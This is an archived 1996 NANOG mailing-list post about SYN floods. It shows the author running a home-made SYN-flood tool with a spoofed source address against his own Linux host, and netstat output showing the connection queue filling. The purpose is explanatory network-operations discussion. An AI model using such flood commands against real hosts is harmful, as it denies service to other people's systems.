SYN floods (was: does history repeat itself?)
Taner Halicioglu
taner at CERF.NET
Tue Sep 10 02:35:45 UTC 1996
On Mon, 9 Sep 1996, Vektor Sigma wrote:
> On my private network I can send 600 or more SYN packets to my telnet port
> (w/faked, unreachable source addresses + random seq numbers), yet the
> port doesn't seem to be flooded.
>
> It's a linux box.
>
> The telnet daemon seems to be able to tell the difference between a faked
> packet and a real one. Even when spoofing from localhost, it reports a
> connection from unknown.
>
> Obviously, there seems to be a solution to this problem. ??
I'd like to see this. First of all, the telnet daemon never sees the SYN.
The SYN is responded to by the kernel (with a SYN/ACK).
taner at BOOM:ttyp6 (Linux) ~/code >./syn
./syn srchost dsthost port num
taner at BOOM:ttyp6 (Linux) ~/code >./syn 1.2.3.4 boom.net 23 10
synflooding boom.net from 1.2.3.4 port 23 10 times
Now to try to connect to it...
taner at nic:~ >telnet boom.net
Trying 134.24.7.153 ...
telnet: connect: Connection timed out
telnet>
And why?
taner at BOOM:ttyp6 (Linux) ~ >netstat -tn | grep 1.2.3.4
tcp 0 1 134.24.7.153:23 1.2.3.4:59914 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60170 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60426 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60682 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60938 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:61194 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:61706 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:61962 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:62218 SYN_RECV root
taner at BOOM:ttyp6 (Linux) ~ >uname -a
Linux BOOM.NET 2.0.0 #5 Sun Sep 1 21:34:31 PDT 1996 i486
Looks like Linux can only queue 9 SYN's...
-Taner
-=-=-=-=-=-=-=-=-=-=-=-=[ D. Taner Halicioglu ]=-=-=-=-=-=-=-=-=-=-=-=-
taner at CERF.NET -=- taner at ucsd.edu -=- taner at sdsc.edu
IRC Admin: irc.cerf.net -=- U. of California, San Diego, Computer Sci.
taner at cisco.com -=- Cisco Systems -=- Enterprise Network Management
-=-=-=-=-=-=[ Linux 2.0.* OS -- http://www.sdsc.edu/~taner/ ]=-=-=-=-=-
More information about the NANOG
mailing list